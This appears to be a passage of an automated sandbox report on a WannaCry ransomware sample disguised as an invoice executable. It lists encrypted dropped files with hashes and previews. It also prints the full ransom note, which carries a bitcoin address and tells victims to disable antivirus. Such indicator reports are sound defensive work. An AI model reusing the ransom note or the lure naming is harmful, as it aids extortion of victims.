                                                          SSDEEP:24:OahszzHUchuEkke5581nqlBndsOXtSexowtGjgQ9D8LZrOfYZACC6s:/scTEkvQqlBWedcgQ9aOcCJ
                                                          MD5:CE809ED94E41990DABFCA8234D0B5735
                                                          SHA1:60DEACD34E8C524A495E3B0675915BEF958F67A2
                                                          SHA-256:D1C0FC9897B7DE837B47E28F05B8879608CB28B1FBC4E452072C65844375B941
                                                          SHA-512:DE833F95DFFACAEC9302A94907DA86F74288C6E4E40EA97E668A19EF9C221088A7A32F07BA07CB47ABF694E905619291B52B926E51FF9CBFCE555AEB1360B10E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..)v5xE.0...4...j....d):X..e..3.M.q...#...:..mT..k.0.ss..oA?l...{....6..q.N....Fly.Q..L9,-9.jD..@.>....t..l..KV6Z.X.......a..S..W....]...I.d....K. #58..[..H...T..........e.+..NXT...1...re/...M.A...m.f-Pl.B=;.Vd..f.....:..{TF../.2..G.;..c}.wu.F......z[...g....cn?.<.....zk.,../..v...J..,2;...E&..Q....+.CxU)aly{..N..6=3=../.Pm.#.._..>#..kt..B.....]E.j.Z.2.T.b.,!S.+.N$JX(~m......W<....V.u<.).]B...'...x.j.....w.........VZ........._.*..8l.....#".......@.!.\...f..ik.....j..$^.f....ddC.[.Q.g.o..z.... M.....v7.G3.}....9c..uz.j\-O...K..%......b..IF-..R4g.E.....8.A.[40..6@:.,..@....+...Z.....w;.^(....:.O..WNbSn...^.T-..[..A..?.....o.C..j.L...B.....Y...U....."sC%.Wr.c.8.dr..X*{.D..l.n...G..x.m.i@,s....%..+.LDw..L.B..P....@..#.7,o.>$.M.|:.za.N.....EY=..`....%F...@.........O...`f......}|..K...?..[..Nf.D..P.o.)....:.+..cQ......wK.D.q!&f...F...~....f3..q.MRQ=..a!.sB5t=.]_U.V.~.....V..vLa=f......'..02).S.&.~..#....QRrYn..e...#.2..F7.....P....e@.c._...?..

                                                          C:\Users\user\Documents\LIJDSFKJZG\VWDFPKGDUF.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.865557663817537
                                                          Encrypted:false
                                                          SSDEEP:24:bk8LCIblJO79SeGPv0EV6CNFR1jBv47EuzjzusMv2+QcXFGfeBvG5ZHh4xh1LPm:bkaYxSeQxMC3XaguzjzusMe+RUU+LHIm
                                                          MD5:E75BDBBEB548F20430642166C8A22956
                                                          SHA1:3761C4E9D358F9F5B5C837EAFFDDEED5FF0AF875
                                                          SHA-256:C756920BBAD521DACF87517CFF65A60A4A25A2BBF72F23F873767FCE7514A6F2
                                                          SHA-512:EE1D192D850869073645F181C5F204F63523458E318EF1622924EE37D5FE311F0A4872205B04EEAB3D38AE44E9DF628FBF105A1AE23331CD0AC72877CE20CD2E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....t.S.(.....XR..P.!m.............p..+.R..-.2..|3.#Dv&..t..@...ze..ct..a.J=C....Q.#...y?.V0.~.D.I.e..H"....:.....>.Q.?.[....M-0...0.....I..._0.Y.Z.......4..{QO.;p...IOK...A2.t...Q.6..q<.i..xt.@X..K...c.Y.0m^/.(.S$.&....d.....M9..........DV_.0..............F..N&..xJ...._u.).6g.....<..[..T...?..7..i..A*G......lK%~..e2.4. 0.2{....o.E....@...z.Q.../%...d.^..k.Q......)-.O;..#R....m....A.W..$n........y.D.!.....N.,.:*>./.A.2ls.;...>4u.w..mw.b.....R...!..Lm...KNn<.....ij.;7.Ye{.".....[.D.T.P..C...7.(....i.q.....M.......~.H..7....5:.5&."p=l..t<.../.....X.i...h.....>.c...E....k.V.EL;qVBJc..y.....;..b.{.'.0..F..j....j........._..pE...[.9.pIC 1..@.e.].ID..T..#..|.......j6...k..\......3..WW`.....h..0E.j%..a.t.W[/...qU&"...rl..Q....IP.....f..XG.n..d...d...$.bk.$.....)q....V.N.K..._...>?..k.......3r.U!.f,.:....F.}....R*..l..Jq....U.P...o..5......7..I.M.K....3+.!....mk.KL.\....Jv..=....5vnxL...H.........!U..6.J2.b..y...*....~F...B...T

                                                          C:\Users\user\Documents\LIJDSFKJZG\VWDFPKGDUF.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.865557663817537
                                                          Encrypted:false
                                                          SSDEEP:24:bk8LCIblJO79SeGPv0EV6CNFR1jBv47EuzjzusMv2+QcXFGfeBvG5ZHh4xh1LPm:bkaYxSeQxMC3XaguzjzusMe+RUU+LHIm
                                                          MD5:E75BDBBEB548F20430642166C8A22956
                                                          SHA1:3761C4E9D358F9F5B5C837EAFFDDEED5FF0AF875
                                                          SHA-256:C756920BBAD521DACF87517CFF65A60A4A25A2BBF72F23F873767FCE7514A6F2
                                                          SHA-512:EE1D192D850869073645F181C5F204F63523458E318EF1622924EE37D5FE311F0A4872205B04EEAB3D38AE44E9DF628FBF105A1AE23331CD0AC72877CE20CD2E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....t.S.(.....XR..P.!m.............p..+.R..-.2..|3.#Dv&..t..@...ze..ct..a.J=C....Q.#...y?.V0.~.D.I.e..H"....:.....>.Q.?.[....M-0...0.....I..._0.Y.Z.......4..{QO.;p...IOK...A2.t...Q.6..q<.i..xt.@X..K...c.Y.0m^/.(.S$.&....d.....M9..........DV_.0..............F..N&..xJ...._u.).6g.....<..[..T...?..7..i..A*G......lK%~..e2.4. 0.2{....o.E....@...z.Q.../%...d.^..k.Q......)-.O;..#R....m....A.W..$n........y.D.!.....N.,.:*>./.A.2ls.;...>4u.w..mw.b.....R...!..Lm...KNn<.....ij.;7.Ye{.".....[.D.T.P..C...7.(....i.q.....M.......~.H..7....5:.5&."p=l..t<.../.....X.i...h.....>.c...E....k.V.EL;qVBJc..y.....;..b.{.'.0..F..j....j........._..pE...[.9.pIC 1..@.e.].ID..T..#..|.......j6...k..\......3..WW`.....h..0E.j%..a.t.W[/...qU&"...rl..Q....IP.....f..XG.n..d...d...$.bk.$.....)q....V.N.K..._...>?..k.......3r.U!.f,.:....F.}....R*..l..Jq....U.P...o..5......7..I.M.K....3+.!....mk.KL.\....Jv..=....5vnxL...H.........!U..6.J2.b..y...*....~F...B...T

                                                          C:\Users\user\Documents\LIJDSFKJZG\WSHEJMDVQC.png

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.835256169210775
                                                          Encrypted:false
                                                          SSDEEP:24:wQtDzA+/3XXb5MEJpl/ULpFpqvWnLhFzOowu1iJwnbtTTUXVTRT:btDzR/3bDhUfhIkEwnGVTRT
                                                          MD5:ED11E13DDEC4CB23F44CE3A765606D70
                                                          SHA1:0A4837C6E9FFFC0D2AF9A54195F096BD60621D11
                                                          SHA-256:B5467290B6D406BA071F0933BEA85A236DFA1CC1634CCF7778BD3041CA2412F5
                                                          SHA-512:244AB579FFE769E7ACC12B8B799217F7C6AE9B1298F471E7B9DAE0391110B41B84269B42CCD7FA81BA08DDCBA9B43CFAB0BBFF3753E39A1F9F5F86A265F1FF4A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.G..e..?.8......+Ugv.M..u.E."..@....?8...s.......`..t.......OC.n.OC..O..d.75......Q..H...W...*.......=...7$...1.gi.L....C.........r.....v.(..B.+-.\.~^U..Z..V.....D...j<..m...5..vM.Z....\...Y ....U.......`L....=.T+..c..\.%.D!nY.JeC.jcb..x.)u.Q9.^^u.2BzKU..f.9./A...]v....RK....."+b9.s..F.....y@C.............)S.;T.G..\t..i....nf.._.l..@....S.n..7O.U.0...o.rt..5.[.R....6f``y......_........-..u..(..........n.S....~...N..x.-...^.h...9\....y..{.D.X....d..0]}..M...h..._...~6..........>.<w.._lo...e.C{.<....I/..I6...lj..@.B......r......X$*./q......0.B.......X3S...bX>..f..A.Y-n...S|:......i(k o...'...h....A*DW...Mp)...w.>I?.d....6...wV.Ec.....w..D...yI......Bu..v............0...ht...}..'T&Y....b......].....H....~.....Z..Q1.....'/..^)jH....;..a~...e.I..`.e...*/.E.!f....1_.c......5BW.C..3.h2....d.....]x.8...:.qo;R&....?p.z.]...>k|5..g..u+.}b=].o.].JsFu.............t........O..)......$....)..O..-..6~6".p..g. #1............s..T.N.d.Req....3...

                                                          C:\Users\user\Documents\LIJDSFKJZG\WSHEJMDVQC.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.877005446341921
                                                          Encrypted:false
                                                          SSDEEP:24:bkSGw6jRXVMvrc60XEkxc8IHkU8x6QmTsaxedwOavfmCwIMA9oSDtT:bk3LOaX+E1eEKvuCwvA9ztT
                                                          MD5:9D676B89E53BB31A5BEA2C2379282558
                                                          SHA1:58AB7872884DD02A0343B69F5D1772F9A3A2B4E0
                                                          SHA-256:F3646C9B9E96988D8BE7E1C4A4A8C2190B2364303D4CACE95819D575DE4C137E
                                                          SHA-512:235C8C4793BC41045415E049966E59D88AC5766C13FF2A125DC76DA6C7C61C0059B7B08527D00C78F4EBDB9D413EF00800365735418DD70D624E510CF933216B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........?.....o..>...~.~./"..4...D.....4J..T.qaT.5..'.]K..=...D..8.R.p.8#...P.fk.E...X...Q...eP7s.l$:R...o>...+<.v.h]1..... .k....u@o2q..h..O\.......E.pW.D.].R..$.1..v.b...Bvh.H..z.NT.O("b<..\...F.....j...D...7E....m..J....+.t....q....!.%-z;............7..0...tYN....@#X\.f.......<t.A.N&....%}.g.g+.$...{....{.:;P.NH..rF..s.~....N+....,....2.........K..f.'.y2Y.K)o.Z....$...i.:M.W.]..s.q.#.".Kg.L..[.D.......n;f.Ug.eW...^{.{.n..@.....8..7`.>.!..P.A.......s|.J;.;.V...=uF?....J...}b......l...W.'...Ar...>w.......4.{X....o....l7.U]...>......w...2..P.....%..c..j...v..2.[6..J._8..m...WR.....(..F.....PJ..>.......c.z...c.dd....{^.M.(W..AgM+\Q0g^.\.....a...t;{..Q.Y..-Z....IkY9..F5.*.=......%..j.=..-6...2`.."p..#.by.'.,...%.'..6e;........`k7i...v..U...+.#Xs........G.}N./G....0.S2..q...UvE...T..=...J.?.,.&.....Pu...|NP....m~..x......|IQ9y"i...x...4.I..V...|..^.%....>.P..Z......H...d.<<U>...V q.7...qe......t.?o.YdE....<mHA<..!D..{O.

                                                          C:\Users\user\Documents\LIJDSFKJZG\WSHEJMDVQC.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.877005446341921
                                                          Encrypted:false
                                                          SSDEEP:24:bkSGw6jRXVMvrc60XEkxc8IHkU8x6QmTsaxedwOavfmCwIMA9oSDtT:bk3LOaX+E1eEKvuCwvA9ztT
                                                          MD5:9D676B89E53BB31A5BEA2C2379282558
                                                          SHA1:58AB7872884DD02A0343B69F5D1772F9A3A2B4E0
                                                          SHA-256:F3646C9B9E96988D8BE7E1C4A4A8C2190B2364303D4CACE95819D575DE4C137E
                                                          SHA-512:235C8C4793BC41045415E049966E59D88AC5766C13FF2A125DC76DA6C7C61C0059B7B08527D00C78F4EBDB9D413EF00800365735418DD70D624E510CF933216B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........?.....o..>...~.~./"..4...D.....4J..T.qaT.5..'.]K..=...D..8.R.p.8#...P.fk.E...X...Q...eP7s.l$:R...o>...+<.v.h]1..... .k....u@o2q..h..O\.......E.pW.D.].R..$.1..v.b...Bvh.H..z.NT.O("b<..\...F.....j...D...7E....m..J....+.t....q....!.%-z;............7..0...tYN....@#X\.f.......<t.A.N&....%}.g.g+.$...{....{.:;P.NH..rF..s.~....N+....,....2.........K..f.'.y2Y.K)o.Z....$...i.:M.W.]..s.q.#.".Kg.L..[.D.......n;f.Ug.eW...^{.{.n..@.....8..7`.>.!..P.A.......s|.J;.;.V...=uF?....J...}b......l...W.'...Ar...>w.......4.{X....o....l7.U]...>......w...2..P.....%..c..j...v..2.[6..J._8..m...WR.....(..F.....PJ..>.......c.z...c.dd....{^.M.(W..AgM+\Q0g^.\.....a...t;{..Q.Y..-Z....IkY9..F5.*.=......%..j.=..-6...2`.."p..#.by.'.,...%.'..6e;........`k7i...v..U...+.#Xs........G.}N./G....0.S2..q...UvE...T..=...J.?.,.&.....Pu...|NP....m~..x......|IQ9y"i...x...4.I..V...|..^.%....>.P..Z......H...d.<<U>...V q.7...qe......t.?o.YdE....<mHA<..!D..{O.

                                                          C:\Users\user\Documents\NIRMEKAMZH.mp3

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.789710739446829
                                                          Encrypted:false
                                                          SSDEEP:24:53KV8andSWgEM7lLnhrCJoKgbg27f/MPSxPnpfkXrHU:56VXtA7lLnhrCvAuCPn1kXr0
                                                          MD5:C587FFC44075D235F3CF888592089B8F
                                                          SHA1:1714F0AE1B6F8931D62DDF9B4F14429C4622AB2E
                                                          SHA-256:D461AAE5215EB856A7D54A573A14194A0BC18CD8859CC8E1E72140855FCE0571
                                                          SHA-512:FC2126ADBA9C705E33BB0316554264C0E075E9438F81A3DA4872DA710957DECDB69DD5CBBE57C09C1B0300D0C0EF82A1BB46561A3F085FD3731BD05818E6381E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:;..l..u...h......m.../...v5v..(Ak..<k...r.?5..Z[x.=....S...Z......+.n....@..........U3......%......O.q.../.... . VH.s.L..-.}.p.(u.%;...........{.oL.? .... .5c{..z..*........r@...a..~...... .*.P.....!p}k...c...l.d#.ehr.....S).,M`c.e '..c:.l_.1...R.y"..U.2....<=.J.~O.x..Yt...8..J....|...}ZH3.P..q..-#......e.Q3od..._...._j.1B......s.'...l."..0.O.5>...^@X.x..=...y{.\.8......\.......E.~R..._h.iRr...(.......4....0X.q.c^.1>...}.>V.7y.`.r8Y..1w7..".@.....P{......T..dtS............A.j..0....}.....'...'.6..p....:q.6. ...Ko...q.?....A......3rC..l;,m.......'..$......y.0<....m&.."G......4..".h3...y.....]5......u.eu`YVs..>.......V.(qr....v..I..^U..ZW........<..bZ.6..v../....B.ZS{.6IW.....a.1..c.S.....9..C........<|...h.g........A.vc[.......E+.`.e.H......k.{.7....2hoU|G.e.s....gg..-.".:+......\..$.._...|Q.%.R@....z...^L..V...L.....-D..f.~...I.S..........%$0. ... ....S..2..(.<....k-.Nw .....#.|.x.%..st.@..:51..Q+rU~.%...K....4."..n"I4/.B.z..T..f.....

                                                          C:\Users\user\Documents\NIRMEKAMZH.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.855853802680026
                                                          Encrypted:false
                                                          SSDEEP:24:bkyE/YeWbhYZhIhY3Ia+q0MMdvGXHDTemx89AgftRilACGxx3OeP6t:bkvwbbCZShDbq0MMdOTTwAgWXGxbit
                                                          MD5:467299C5B41836023F08A3344E61BCBA
                                                          SHA1:04E1071C0F4246E55917258E371C95C5FC719ED4
                                                          SHA-256:A411EC3632FAA5A2749B563A94D8D6654D75C5E52A77D3E4F094A014E5E1917B
                                                          SHA-512:0049A6F4F862EAAD594606012E4A28584C431179DECB09CD2970C847B936A0630BB2F64C77D39FAFC5F8443D49A3942C614CC06A72603DBEC0C34E4AD75773B8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....w....Rd[IA)?.y....p...%.k."b.....}@.B....@P..+L..|...[3.,.............o..f...F.+...6;'4.,.....B.Io....gG.!$+...S....C"zv.z.{,m..........H...He..k...w..Z..eI.*..l.5.P...}..KX..C........+..PI..AB.o.)...k.0.._G..A.(.5.w.j..e7*,0O...'9.B...\.].y."............i.6..z......qO5..$.t.....A/;M....~..#....D.j..y.O.o..:.q>.kuP.a.>.7.CN./.K...m..A.v.3...Te'../...D..@e.q...gcD.-xg%..~[....vL..M0..l.+.f.W.m...ajb..j.B..>@......=.6`.a........^..Q.I..L.No...~v@\.Vi.Y......iH..&l.0......9,....x...\/R.yO.O..n...._..6..,..4....YM...{.....c~.+......%.|(J...[zx{..Oe.-...wN.o....*..d}..h...1..pJ/....V.#.Z....9.G.....w.i.4.?@zI....x.~..Y:A.)6..JtB\.....M....9..s.W^...6.H..q..N.&K Je.p...u.?..P.T..:..;.OK'..#.T.mg..:.%Sl|.6A...(.1+.[....F.9....'x.e.e9...H..F#..|y..;Y19.s .kfH.+...../..Z.5.E"L~.mHb..,....[.K.........M.d...+...i&}=~...X....1......;....W..U...t...b.:/e....e0...e.7.i..(#:g_]..{.U.s._F...$.......v..9."\......J.}.<....8..~..._........;\..

                                                          C:\Users\user\Documents\NIRMEKAMZH.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.855853802680026
                                                          Encrypted:false
                                                          SSDEEP:24:bkyE/YeWbhYZhIhY3Ia+q0MMdvGXHDTemx89AgftRilACGxx3OeP6t:bkvwbbCZShDbq0MMdOTTwAgWXGxbit
                                                          MD5:467299C5B41836023F08A3344E61BCBA
                                                          SHA1:04E1071C0F4246E55917258E371C95C5FC719ED4
                                                          SHA-256:A411EC3632FAA5A2749B563A94D8D6654D75C5E52A77D3E4F094A014E5E1917B
                                                          SHA-512:0049A6F4F862EAAD594606012E4A28584C431179DECB09CD2970C847B936A0630BB2F64C77D39FAFC5F8443D49A3942C614CC06A72603DBEC0C34E4AD75773B8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....w....Rd[IA)?.y....p...%.k."b.....}@.B....@P..+L..|...[3.,.............o..f...F.+...6;'4.,.....B.Io....gG.!$+...S....C"zv.z.{,m..........H...He..k...w..Z..eI.*..l.5.P...}..KX..C........+..PI..AB.o.)...k.0.._G..A.(.5.w.j..e7*,0O...'9.B...\.].y."............i.6..z......qO5..$.t.....A/;M....~..#....D.j..y.O.o..:.q>.kuP.a.>.7.CN./.K...m..A.v.3...Te'../...D..@e.q...gcD.-xg%..~[....vL..M0..l.+.f.W.m...ajb..j.B..>@......=.6`.a........^..Q.I..L.No...~v@\.Vi.Y......iH..&l.0......9,....x...\/R.yO.O..n...._..6..,..4....YM...{.....c~.+......%.|(J...[zx{..Oe.-...wN.o....*..d}..h...1..pJ/....V.#.Z....9.G.....w.i.4.?@zI....x.~..Y:A.)6..JtB\.....M....9..s.W^...6.H..q..N.&K Je.p...u.?..P.T..:..;.OK'..#.T.mg..:.%Sl|.6A...(.1+.[....F.9....'x.e.e9...H..F#..|y..;Y19.s .kfH.+...../..Z.5.E"L~.mHb..,....[.K.........M.d...+...i&}=~...X....1......;....W..U...t...b.:/e....e0...e.7.i..(#:g_]..{.U.s._F...$.......v..9."\......J.}.<....8..~..._........;\..

                                                          C:\Users\user\Documents\Outlook Files\@Please_Read_Me@.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                          C:\Users\user\Documents\Outlook Files\@WanaDecryptor@.exe.lnk

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                          C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271360
                                                          Entropy (8bit):7.999251702688857
                                                          Encrypted:true
                                                          SSDEEP:6144:nm+2KG2DxX4i2d5WYgYOK5PTYREt/j+Z9qpvyWYJlG5mmM:nm+BBxuaYhX7OA/jigpvu3G5mmM
                                                          MD5:B103D8F0B3532D62D3C2EC56EFA2C68A
                                                          SHA1:ADD37CA55017F6C48C2DC0075BFFD6E539E2658E
                                                          SHA-256:AABDAEDD41777838A2AFC22434DE19B8EBC46992ABD32987FEB6E28D2DD7DA65
                                                          SHA-512:3FAC126233C5DE65AE0934FEB6053F433CEE9E9BDE0CF6EF98C4F91A9E7184E1DD44368B7104FEFD6408D65F48806777FBD1E226D82F4A38C13A9BB43489900A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:<...)....?..by.Cmr."Y....!..=..VF........&..y.A..;..1.5...H..C..U.@!.%....f6.a...!....2.1.Oc#...C..7. t.oLU.2...x........1GD.).!o.T.%xJ..RK.&..Jl:}l.py....z...p.){.....'.HDas..>!.......V>.......I&.,..'.&...ke....;.-...4V.....K.D...(T.7=....Zs...e}.Y9Bxu..Y............a..k.CD..6....j.<@@..2n.....P...k?...o........ ....T....A.y..q...N^.GF...9o.!...y`#t..@..W...f...........F.-7F.xu..<#?.Bs..b..~c...'. .p..(...~....6.Q..w.%=.....G.O.y.......`.6u..F{._.....%9C....O.&|......[,[....4V...i.......Dx......//....hU.i....T.1j.:~.\([Q.jiK..+.&.U....V.M.~..N.y.w#...A.g*0.T.^.v.. ).x.}8_.K<..#~..p.w..."....}..OI...Vji.....q...)B..!..r........:.%X..(9[..).2.0Jl.~..D..v..p)hJ......6K. QG.9.8...8B.~FR,s..qh..Xo.7.^u}<.@k..g/DR.x..L...(.|...&O.8;(n.....85.......<..2.....4./..P...$....Q.?.tG.w..K....&...m...`."E..>....|...!L..TqnV.RR..t.....j.oFT.c.S.4&.5............_..S..d.#...P.......x..n...Z.s..9h.E...7q.f.UR..r..a..?.{...oK...@a......"...3..#.I.tqDb.*..

                                                          C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271640
                                                          Entropy (8bit):7.9992626317546405
                                                          Encrypted:true
                                                          SSDEEP:6144:KnY1QI4S4Mf/HBROcvaXO6OhV7upuziNogl:KH3MxRjitm1uphF
                                                          MD5:05111181DCC11BC255511485B4FCEE87
                                                          SHA1:4751AA414B5075A30A4E5997F0250CD4DF845472
                                                          SHA-256:3C748993E7FD23EABFA53101AFFFE475A34EA6778303AD4734E03453B5DB3B00
                                                          SHA-512:8ED921166B70FEE10EB5A6F4E9989767CFC7BF4D81A0568E1ADA75C90014E7F4DA568A0CF4F509A3E0FDE013086E430AA9A04137500CD4DF6C0F123988E0DA7F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....6..2.&......\z...1E...L....X._..Q..;.(.S:[...L.+..R...`q....#\=...#..q.4^..?@..W......1.9].1...~G..+u..\_.,..Y.3.q.$6..U...v.P.Bx]..)3ij..W.:............>.1.t9U.;~....c~3f..zw...m...E.K..........P.Q.k...-...m.].I...U.`.'...:R...d...W.~........$......].U..Y.....L..:'P..B.r.n..1.....-h+.1.....=k.....D.{7.E.u..p..k./..n*....-..*j..+.;B[....O......Z...x}cY..4.....g...iS.._......:...vI.:Y4.4N.y..=gD.K.|.."k.3..N9..Z...V..@2.~>d.}.)..D.M..Z........8.fp..4..p..1Ck..s....Xc...`.2.Z..3')iQ.Q4e .~.C..|Jp..JQk..[O..c=b..\\w...25...Rg%.H.....e..X....\.D.E..l.eC..:..m...N9...Z<~I#...-......|...n.*...$.WMn.$.(.....#........v.e.,.y.GS.......w+..m..+C.~.d.rFF....4rq1..........6..7..9.....*o>......fF..........CQ=9..I...!....E\=cT..../.pW..c..C.?..@`.1..x}2...N...:-...../b.A2.mk.B5..).H...].J.r..e..5.I..`o.H.....Z.t..M..@..*..{0...N....D.]...].}.v...+H,.e.^."t{"...`a.....hi.J>...7n..@...G....m.a.U.`5<l.mXbi.......?:.M..;].......q.k.qYM{.

                                                          C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271640
                                                          Entropy (8bit):7.9992626317546405
                                                          Encrypted:true
                                                          SSDEEP:6144:KnY1QI4S4Mf/HBROcvaXO6OhV7upuziNogl:KH3MxRjitm1uphF
                                                          MD5:05111181DCC11BC255511485B4FCEE87
                                                          SHA1:4751AA414B5075A30A4E5997F0250CD4DF845472
                                                          SHA-256:3C748993E7FD23EABFA53101AFFFE475A34EA6778303AD4734E03453B5DB3B00
                                                          SHA-512:8ED921166B70FEE10EB5A6F4E9989767CFC7BF4D81A0568E1ADA75C90014E7F4DA568A0CF4F509A3E0FDE013086E430AA9A04137500CD4DF6C0F123988E0DA7F
                                                          Malicious:true
                                                          Reputation:unknown
